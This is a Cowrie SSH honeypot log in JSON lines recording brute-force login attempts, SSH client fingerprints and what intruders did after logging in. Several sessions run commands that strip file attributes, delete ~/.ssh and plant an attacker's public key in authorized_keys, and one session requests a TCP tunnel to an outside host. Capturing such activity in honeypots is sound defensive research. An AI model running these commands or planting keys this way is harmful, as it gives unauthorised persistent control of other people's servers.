{"eventid":"cowrie.login.failed","username":"admin","password":"Password@123","message":"login attempt [admin/Password@123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:13.664530Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:14.794052Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:15.922797Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":54354,"dst_ip":"1.2.3.4","dst_port":22,"session":"8de48c4b771c","protocol":"ssh","message":"New connection: 27.112.78.170:54354 (1.2.3.4:22) [session: 8de48c4b771c]","sensor":"my-vps","timestamp":"2025-08-26T01:18:16.765383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:18:16.766774Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:18:17.034775Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.login.success","username":"root","password":"Zc123456!","message":"login attempt [root/Zc123456!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:18:18.145827Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:18.499613Z","src_ip":"212.227.235.229","session":"717a8f578fed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:18:18.709257Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:18:18.710030Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:18:18.711185Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:18.984509Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:18:19.626072Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:18:19.626739Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:18:19.897640Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:19.898883Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":39026,"dst_ip":"1.2.3.4","dst_port":22,"session":"e98ed716707d","protocol":"ssh","message":"New connection: 27.112.78.170:39026 (1.2.3.4:22) [session: e98ed716707d]","sensor":"my-vps","timestamp":"2025-08-26T01:18:20.155457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:18:20.156303Z","src_ip":"27.112.78.170","session":"e98ed716707d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:18:20.420754Z","src_ip":"27.112.78.170","session":"e98ed716707d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:21.497441Z","src_ip":"27.112.78.170","session":"e98ed716707d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:22.757583Z","src_ip":"27.112.78.170","session":"e98ed716707d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":39036,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e571b2f0538","protocol":"ssh","message":"New connection: 27.112.78.170:39036 (1.2.3.4:22) [session: 3e571b2f0538]","sensor":"my-vps","timestamp":"2025-08-26T01:18:23.025293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:18:23.026518Z","src_ip":"27.112.78.170","session":"3e571b2f0538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:18:23.292400Z","src_ip":"27.112.78.170","session":"3e571b2f0538"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:18:24.396290Z","src_ip":"27.112.78.170","session":"3e571b2f0538"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:24.663351Z","src_ip":"27.112.78.170","session":"3e571b2f0538"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:24.679268Z","src_ip":"27.112.78.170","session":"8de48c4b771c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34744,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d240cafd591","protocol":"ssh","message":"New connection: 212.227.235.229:34744 (1.2.3.4:22) [session: 8d240cafd591]","sensor":"my-vps","timestamp":"2025-08-26T01:18:47.914051Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:18:47.915427Z","src_ip":"212.227.235.229","session":"8d240cafd591"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35054,"dst_ip":"1.2.3.4","dst_port":22,"session":"df55637ec561","protocol":"ssh","message":"New connection: 212.227.235.229:35054 (1.2.3.4:22) [session: df55637ec561]","sensor":"my-vps","timestamp":"2025-08-26T01:18:48.044981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:18:48.045891Z","src_ip":"212.227.235.229","session":"df55637ec561"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T01:18:48.177773Z","src_ip":"212.227.235.229","session":"df55637ec561"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:18:48.572451Z","src_ip":"212.227.235.229","session":"df55637ec561"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T01:18:48.704375Z","session":"df55637ec561"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":36696,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90c84c6ed93","protocol":"ssh","message":"New connection: 27.112.78.170:36696 (1.2.3.4:22) [session: a90c84c6ed93]","sensor":"my-vps","timestamp":"2025-08-26T01:19:46.993893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:19:46.994929Z","src_ip":"27.112.78.170","session":"a90c84c6ed93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:19:47.267046Z","src_ip":"27.112.78.170","session":"a90c84c6ed93"}
{"eventid":"cowrie.login.failed","username":"yy","password":"123456","message":"login attempt [yy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:19:48.398784Z","src_ip":"27.112.78.170","session":"a90c84c6ed93"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:19:49.674534Z","src_ip":"27.112.78.170","session":"a90c84c6ed93"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:19:58.047073Z","src_ip":"212.227.235.229","session":"df55637ec561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38110,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f5cbfd1fff3","protocol":"ssh","message":"New connection: 212.227.125.160:38110 (1.2.3.4:22) [session: 1f5cbfd1fff3]","sensor":"my-vps","timestamp":"2025-08-26T01:20:23.843332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:20:23.844625Z","src_ip":"212.227.125.160","session":"1f5cbfd1fff3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:20:23.895259Z","src_ip":"212.227.125.160","session":"1f5cbfd1fff3"}
{"eventid":"cowrie.login.failed","username":"nic","password":"nic123","message":"login attempt [nic/nic123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:20:24.048712Z","src_ip":"212.227.125.160","session":"1f5cbfd1fff3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:20:25.101346Z","src_ip":"212.227.125.160","session":"1f5cbfd1fff3"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":57882,"dst_ip":"1.2.3.4","dst_port":22,"session":"067fa5091019","protocol":"ssh","message":"New connection: 27.112.78.170:57882 (1.2.3.4:22) [session: 067fa5091019]","sensor":"my-vps","timestamp":"2025-08-26T01:21:18.001266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:21:18.003089Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:21:18.263487Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.login.success","username":"root","password":"111222","message":"login attempt [root/111222] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:21:19.348663Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:21:19.932852Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:21:19.933575Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:21:19.934784Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:21:20.197685Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:21:20.734558Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:21:20.735274Z","src_ip":"27.112.78.170","session":"067fa5091019"}
